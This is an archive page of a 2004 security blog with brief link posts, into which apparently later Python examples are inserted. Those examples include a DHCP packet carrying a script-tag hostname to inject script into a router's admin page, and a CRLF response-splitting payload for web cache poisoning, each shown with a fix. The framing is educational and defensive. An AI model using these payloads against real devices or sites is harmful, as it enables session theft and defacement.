Security musings (reflectorium)
Tuesday, June 29, 2004
Instant Messaging in the Enterprise introduces risks
This seems to be a hot topic lately, with predictions of a possible instant messaging worm. A nice write-up, "Top 5 IM security risks", can be found here:
http://www.VMyths.com and the 100% virus detection guarantee
A site "about computer virus myths, hoaxes, urban legends, hysteria, and the implications if you believe in them. You can also search a list of computer virus hoaxes & virus hysteria from A to Z".
On the other hand, I think that this particular article, "An open letter to the CISO of the American Red Cross", that they carry right now is grossly unfair to Ron Baklarz and incredibly naive in the way it buys into sales pitches. So two antivirus scanning operations claim that they have a "money back guarantee" if a mail virus slips through... I mean, really... irony on/off?
There shouldn't ever be a 100% virus detection guarantee.
We should have learnt that much by now.
Monday, June 28, 2004
Max Moser's Auditor CD-ROM update
Max Moser has released a new version of the Auditor security collection (auditor-220604-01B). It is available now.
Friday, June 25, 2004
VirusTotal web site
Very cool site: "Virustotal offers a free service of suspicious file scanning, using several antivirus engines."
Wednesday, June 23, 2004
Tuesday, June 22, 2004
Fold your own 2-CD case from a sheet of paper
Jorma Oksanen has instructions on how to fold a 2-CD case out of a sheet of paper. (Without glue): http://www.sci.fi/~tenu/diag/2CD.gif
Found this at Tim Pritlove's Lunatic Fringe.
Foremost - free forensic tool by the United States Air Force Office of Special Investigations
The US Air Force Office of Special Investigations offers a free forensic toolkit.
"Foremost is a console program to recover files based on their headers and footers."
You can get it at http://foremost.sourceforge.net/ .
In addition, there's also a NetworkWorldFusion article to go with it.
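To make the "headers and footers" idea concrete, here is an added example in Python (my own illustration, not Foremost's code): a minimal carver that scans a raw byte blob for known file signatures and cuts out everything between a header and its footer, falling back to a size cap when the footer never shows up. The JPEG/PNG/GIF magic bytes are the real ones; the size caps, function names and the sample blob are assumptions constructed for this example.

```python
# Added example, not Foremost's own code: a minimal header/footer carver in
# the style Foremost uses. It scans a raw byte blob (a disk image, a pcap, a
# memory dump) for known file signatures and cuts out everything between the
# header and the matching footer, or up to a size cap when no footer turns up.

# Signature table: type -> (header, footer, max_size).
# The JPEG/PNG/GIF magic bytes are the real ones; the size caps are assumptions
# chosen for this example (Foremost reads its own from a configuration file).
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9", 10 * 1024 * 1024),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82", 10 * 1024 * 1024),
    "gif": (b"GIF8", b"\x00\x3b", 5 * 1024 * 1024),
}


def carve(data: bytes, signatures=SIGNATURES):
    """Return a list of (type, offset, length, complete), sorted by offset.

    complete is False when no footer was found within max_size bytes of the
    header; the carve is then truncated at the cap (or at end of data) and
    should be treated as a partial recovery, not a whole file.
    """
    found = []
    for ftype, (header, footer, max_size) in signatures.items():
        start = 0
        while True:
            h = data.find(header, start)
            if h < 0:
                break
            window_end = min(len(data), h + max_size)
            f = data.find(footer, h + len(header), window_end)
            if f >= 0:
                end, complete = f + len(footer), True
                start = end                # do not rescan inside a complete object
            else:
                end, complete = window_end, False
                start = h + len(header)    # keep looking for later headers
            found.append((ftype, h, end - h, complete))
    return sorted(found, key=lambda hit: hit[1])


def extract(data: bytes, signatures=SIGNATURES):
    """Return {type: [bytes, ...]} holding the carved objects themselves."""
    out = {}
    for ftype, offset, length, _complete in carve(data, signatures):
        out.setdefault(ftype, []).append(data[offset:offset + length])
    return out


# Constructed sample blob: 16 bytes of filler, a tiny "JPEG", some slack space,
# a tiny "PNG", and a GIF header whose footer is missing (a truncated file).
SAMPLE_IMAGE = (
    b"\x00" * 16
    + b"\xff\xd8\xff\xe0" + b"JFIF-data" + b"\xff\xd9"
    + b"slack slack"
    + b"\x89PNG\r\n\x1a\n" + b"IHDR....IDAT...." + b"IEND\xaeB`\x82"
    + b"GIF89a" + b"\x01\x02"
)

if __name__ == "__main__":
    for ftype, offset, length, complete in carve(SAMPLE_IMAGE):
        print(f"{ftype}: offset={offset} length={length} complete={complete}")
```

The `complete` flag is the check a practitioner wants: a carver that silently emits size-capped blobs produces a lot of "recovered" files that are really slack plus the next file's header, so keep the truncated hits separate from the clean ones.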
Script injection via DHCP
Now this is fun. It seems that with one SOHO wireless router (the AirPlus DI-614+) you can make the administrator run malicious scripts when he looks at the web-based management console.
In a nutshell:
+ you send a maliciously hand-crafted DHCP packet
+ which the router takes and embeds verbatim in the DHCP administrative and log web pages it offers to the admin
Details are at
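The two halves of that bug, as an added Python example (my own illustration, not the router's firmware or the original advisory): `build_dhcp_discover()` crafts a DHCPDISCOVER whose client hostname (option 12) carries a script tag, and the two `render_*` functions stand in for the router's log page, once copying the hostname in verbatim (the behaviour reported above) and once HTML-escaping it. The function names, sample MAC address and page layout are assumptions for this example; the packet layout follows RFC 2131.

```python
# Added example, not the router's code or the original advisory's. It shows a
# DHCPDISCOVER with a hostile hostname option and a log page that either trusts
# that hostname (stored script injection) or HTML-escapes it. Names, the sample
# MAC and the table layout are assumptions made for this example.
import html
import struct

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_MESSAGE_TYPE, OPT_HOSTNAME, OPT_END = 53, 12, 255
DHCPDISCOVER = 1


def build_dhcp_discover(mac: bytes, hostname: bytes, xid: int = 0x3903F326) -> bytes:
    """Build a minimal RFC 2131 DHCPDISCOVER (BOOTP header + options)."""
    if len(mac) != 6:
        raise ValueError("MAC must be 6 bytes")
    if not 1 <= len(hostname) <= 255:
        raise ValueError("option 12 carries 1..255 bytes")
    # op=BOOTREQUEST, htype=Ethernet, hlen=6, hops=0, xid, secs=0,
    # flags=broadcast, ciaddr/yiaddr/siaddr/giaddr all zero (28 bytes)
    fixed = struct.pack("!BBBBIHHIIII", 1, 1, 6, 0, xid, 0, 0x8000, 0, 0, 0, 0)
    fixed += mac.ljust(16, b"\x00")           # chaddr (16 bytes)
    fixed += b"\x00" * 64 + b"\x00" * 128     # sname, file (unused)
    options = DHCP_MAGIC_COOKIE
    options += bytes([OPT_MESSAGE_TYPE, 1, DHCPDISCOVER])
    options += bytes([OPT_HOSTNAME, len(hostname)]) + hostname
    options += bytes([OPT_END])
    return fixed + options


def parse_dhcp_options(packet: bytes) -> dict:
    """Return {option_code: raw value} from the options field of a DHCP packet."""
    if packet[236:240] != DHCP_MAGIC_COOKIE:
        raise ValueError("not a DHCP packet (magic cookie missing)")
    opts, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == 0:                 # pad byte, no length field
            i += 1
            continue
        length = packet[i + 1]
        opts[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return opts


def render_lease_row_vulnerable(packet: bytes) -> str:
    """Router-style log row that trusts the client-supplied hostname verbatim."""
    name = parse_dhcp_options(packet).get(OPT_HOSTNAME, b"").decode("latin-1")
    return f"<tr><td>{name}</td><td>DHCPDISCOVER</td></tr>"


def render_lease_row_fixed(packet: bytes) -> str:
    """Same row, with the hostname HTML-escaped (quotes included) before output."""
    name = parse_dhcp_options(packet).get(OPT_HOSTNAME, b"").decode("latin-1")
    return f"<tr><td>{html.escape(name, quote=True)}</td><td>DHCPDISCOVER</td></tr>"


# Constructed attack packet: the "hostname" is a script tag, well inside the
# 255-byte limit of option 12.
EVIL_HOSTNAME = b"<script>alert(document.cookie)</script>"
ATTACK_PACKET = build_dhcp_discover(b"\x00\x11\x22\x33\x44\x55", EVIL_HOSTNAME)

if __name__ == "__main__":
    print(render_lease_row_vulnerable(ATTACK_PACKET))
    print(render_lease_row_fixed(ATTACK_PACKET))
```

The point worth remembering is that the attacker never touches the admin interface; the DHCP client is on the "trusted" LAN side, the hostname is just a 255-byte opaque string to the DHCP server, and the escaping has to happen where the string is rendered into HTML, not where it is received.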
Monday, June 21, 2004
Security Managers Could Face Court Penalties
Just to showcase how dangerous the security manager job can be, another article, this one titled "Security Managers Could Face Court Penalties". Scary stuff, takes real men, 'nuff said... ;-)
One company's SASSER thriller story
A nice thriller-like story on how some fictitious company experienced SASSER. If someone thinks your job is dull, this is probably what you want to let them read.
Saturday, June 19, 2004
The home of the penguin sleuth cd-rom
Using a live CD for forensics (like Knoppix STD, FIRE, ...).
Internet Security Alliance and its best practice guides
The Internet Security Alliance has published some best practice guides and is working on some more (see http://www.isalliance.org/ ).
CCCure has the story that DHS tells Congress it endorses the ISA Best Practices Guide.
The SASSER author - responsibility and age
Axel has some worthwhile thoughts on responsibility and age, and on what the future might hold for the SASSER author, over at his blog.
Friday, June 18, 2004
IT-Security and outsourcing in the financial services industry
This is my marketing plug. =)
Here's a German review of IT-Sicherheitsmanagement in Banken
(a book on security management in banks that I contributed to last year).
Thursday, June 17, 2004
HOACD 1.0 (bootable OpenBSD + honeyd CD)
The Brazilian Distributed Honeypots Project brings us HOACD = Honeyd + OpenBSD + Arpd on a CD.
"It is the implementation of a low-interaction honeypot that runs directly from a CD and stores its logs and configuration files on a hard disk."
"The CD is bootable and uses the OpenBSD operating system, the low-interaction honeypot daemon honeyd and the user-space arp daemon."
The CD image is available at:
Sunday, June 13, 2004
Blog aggregation sites and "The blog-only news diet"
Poynteronline carries a story on Steve Rubel, a guy who tried to live on a blog-only news diet. Steve also covers this in his own blog, micropersuasion. In the article Steve points out several blog aggregation sites that helped him during his "diet":
Saturday, June 12, 2004
2004 CSI/FBI Computer Crime and Security Survey is out
The new CSI/FBI Computer Crime and Security Survey is out. Dana Epp has a nice summary and links in his most excellent blog. One quote from his summary: "Most organizations conduct some form of economic evaluation of their security expenditures, with 55 percent using Return on Investment (ROI), 28 percent using Internal Rate of Return (IRR), and 25 percent using Net Present Value (NPV)." (Hello Axel!) Somehow I sense an upcoming thread on this on cissp-forum...
[Comment: I had to re-edit this after realising that Dana Epp is a guy... a big one apparently. -> page with his picture? Note to self: X-Files, Agent Mulder, Dana Scully - look for subtext ("the truth is out there?").]
Thursday, June 10, 2004
Security quiz at ISS
ISS is offering some security tests (multiple-choice questions, anonymous, free).
Everyone at SUN can blog
blogs.sun.com is an official site set up by SUN so that all their employees can blog. This Infoworld article discusses some aspects of it. All in all, I think this is a very interesting move. Now, I don't know what SUN would do if any internal information leaked that way.
By the way, on blogs.sun.com there's also this blog entry about getting hit with a denial-of-service attack just prior to an official announcement.
Hacker Intel is shutting down for good
From the site below: "I'll leave Hacker Intel online for a few more days. Eventually I'll take it down so if you want any of the 900 plus stories in the archives grab them now."
It's sad that the site closes.
Terror Threat Levels
The USA has this interesting concept of colour-coding "threat levels", which seems a bit bizarre to me, to be honest, outside a military setting.
Here's the US Homeland Security system explained by the DHS. There's also a nice site called Ready.GOV that has some "guidance". This site has been parodied here.
Whackyneighbor puts its level at
For geekandproud, it's at
A good source of information is here.
Application worms
Just to emphasise my point made earlier that quite a few people are thinking about future worms: here's an article on "Application Worms", which, while they do sound like automated hacking agents, don't look like terribly effective "worms" to me. It has some good points though, and of course Google is a means for finding systems vulnerable to some attacks.
A net law blog
I just came across a Net Law Blog at
They do carry an interesting story about some banks banning 3rd-party (webmail) access for their employees, an idea which was somewhat hotly debated on a few forums.
"A worst case worm" paper by Nicholas Weaver and Vern Paxson (and Stuart Staniford)
This entry is for Axel (Balrog) Eble, who hasn't seen that one on the F-Secure blog before. No really, I wanted to blog this, but then I somehow forgot.
Nicholas Weaver et al. published a paper on a worst-case worm that could cause $50 billion or more in damage by attacking Microsoft Windows systems and carrying a destructive payload.
Apparently quite a few people are developing worst-case worm scenarios now (incl. Axel, Marcus and me). Bruce Schneier just commented on WITTY and the "firsts" that came with it elsewhere. (Basically, he is commenting on that other Weaver paper blogged below.)
Wednesday, June 09, 2004
One of the things we discussed in the last CISSP-FFM meeting.
A new version of the framework has just been released by HD Moore et al.:
Tuesday, June 08, 2004
Reflections on Witty
Wireless Auditing LiveCD
Max Moser's Auditor CD includes a lot of useful tools.
Sanctum paper on HTTP response splitting, web cache poisoning attacks, and related topics
Sanctum published a paper, "Divide and Conquer - HTTP response splitting, web cache poisoning attacks, and related topics", in March 2004. I read it last night. It's an excellent read, very technical, with some sample code. It discusses the behaviour of common platforms, incl. IE 6.0 SP1, Squid 2.4, Apache/2.0, NetCache/5.2 and WebLogic 8.1 SP1. It reads almost like a scientific paper, with a lot of helpful practical information. I think it really helps to understand some of the often-overlooked risks in web services security.
After reading the paper, cache poisoning is no longer a remote possibility. (I know we've seen reports of it being used for years, but this paper adds a new twist.)
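The mechanism the paper is about, as an added Python example (my own illustration, not the paper's sample code): a redirect handler that copies a query parameter into the `Location` header, the CRLF payload that turns its single response into two, a parser that reads the byte stream the way a caching proxy or browser would, and the hardened handler. The `/redir?lang=` page, `example.com`, the function names and the payload are all constructed for this example.

```python
# Added example, not code from the Sanctum paper. It demonstrates HTTP
# response splitting: user input with embedded CR/LF lands in a response
# header, so the byte stream a proxy reads contains two complete responses
# where the server thought it sent one. Page, host and names are assumptions.
import re
from urllib.parse import unquote


def build_redirect_vulnerable(lang: str) -> bytes:
    """302 to /<lang>/index.html with lang copied into the header unfiltered."""
    return (b"HTTP/1.1 302 Found\r\n"
            b"Location: http://example.com/" + lang.encode("latin-1") + b"/index.html\r\n"
            b"Content-Length: 0\r\n"
            b"\r\n")


LANG_RE = re.compile(r"^[a-z]{2}(-[a-z]{2})?$")


def build_redirect_fixed(lang: str) -> bytes:
    """Same redirect, but only an allow-listed language code reaches the header.
    Anything else (CR, LF, encoded or not) gets a 400 instead of a redirect."""
    if not LANG_RE.match(lang):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return build_redirect_vulnerable(lang)


def split_responses(stream: bytes):
    """Parse consecutive HTTP responses from one byte stream, as a proxy would.

    Returns [(status_line, headers, body), ...], honouring Content-Length to
    find each body's end, and stops at the first thing that is not a status
    line (the trailing junk left over after an injected second response).
    """
    responses, pos = [], 0
    while pos < len(stream):
        hdr_end = stream.find(b"\r\n\r\n", pos)
        if hdr_end < 0:
            break
        lines = stream[pos:hdr_end].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_len = int(headers.get("content-length", "0"))
        body_start = hdr_end + 4
        responses.append((lines[0], headers, stream[body_start:body_start + body_len]))
        pos = body_start + body_len
    return responses


# Constructed payload, as it would appear URL-encoded in ?lang=...: it closes
# the 302 with an empty body and then supplies a complete second response.
INJECTED_LANG = unquote(
    "en%0d%0a"
    "Content-Length:%200%0d%0a"
    "%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0a"
    "Content-Length:%2020%0d%0a"
    "%0d%0a"
    "<html>Defaced</html>"
)

if __name__ == "__main__":
    for status, _headers, body in split_responses(build_redirect_vulnerable(INJECTED_LANG)):
        print(status, body)
```

The cache poisoning twist follows directly from the parser's view: if the attacker pipelines two requests through a shared proxy, the first for `/redir?lang=<payload>` and the second for some victim URL, the proxy pairs the second request with the injected `200 OK` and caches `<html>Defaced</html>` under the victim URL for everyone behind it. The fix is not "strip %0d%0a" (encodings vary by platform, which is exactly what the paper's platform survey is about) but refusing to put anything into a header that does not match a strict allow-list.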
Monday, June 07, 2004
Friday, June 04, 2004
Scripting with the Microsoft Baseline Security Analyser 1.2
and of course the FAQ of the beast at
- which is, mind you, not a real beast.
Thursday, June 03, 2004
IDC 3rd Security Conference (Germany, Switzerland)
Looks like it could be a fun event, curious about the actual agenda.
Wednesday, June 02, 2004
Understanding Threat Modelling
Good coverage at Dana Epp's most excellent blog:
also for the Microsoft Threat Modelling tool: